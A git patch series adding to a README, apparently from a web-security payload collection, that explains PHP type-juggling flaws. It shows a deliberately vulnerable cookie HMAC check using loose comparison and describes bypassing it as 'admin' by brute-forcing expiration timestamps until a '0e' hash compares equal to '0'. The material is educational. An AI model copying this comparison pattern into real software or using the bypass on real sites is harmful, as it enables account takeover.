From 35f2834eaa5b5d3b58128b2164d38471835d2553 Mon Sep 17 00:00:00 2001 From: OOP Date: Fri, 23 Oct 2020 23:12:45 +0700 Subject: [PATCH 1/2] add type juggling example --- Type Juggling/README.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 7e97f99..26dcfd1 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -38,6 +38,40 @@ var_dump(sha1([])); # NULL var_dump(md5([])); # NULL ``` +### Example vulnerable code + +```php +function validate_cookie($cookie,$key){ + $hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['$expiration'], $key); + if($cookie['hmac'] != $hash){ // loose comparison + return false; + ... +``` + +The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user. + +If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass. + +``` +"0e768261251903820937390661668547" == "0" +``` + +We have control over 3 elements in the cookie: +- $username - username you are targetting, probably "admin" +- $hmac - the provided hash, "0" +- $expiration - a UNIX timestamp, must be in the future + +Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC. + +``` +hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49" +hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4" +hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b" +hash_hmac(admin|1424869666) -> "105c0abe89825a14c471d4f0c1cc20ab" +... +hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e174892301580325162390102935332" == "0" +``` + ## Magic Hashes - Exploit If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. From f2e30789156f9949d0ffee39cbe6d198e40675d8 Mon Sep 17 00:00:00 2001 From: OOP Date: Fri, 23 Oct 2020 23:15:59 +0700 Subject: [PATCH 2/2] add reference --- Type Juggling/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 26dcfd1..7ceaf0b 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -100,4 +100,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); ## References * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) -* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/) \ No newline at end of file +* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/) +* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) \ No newline at end of file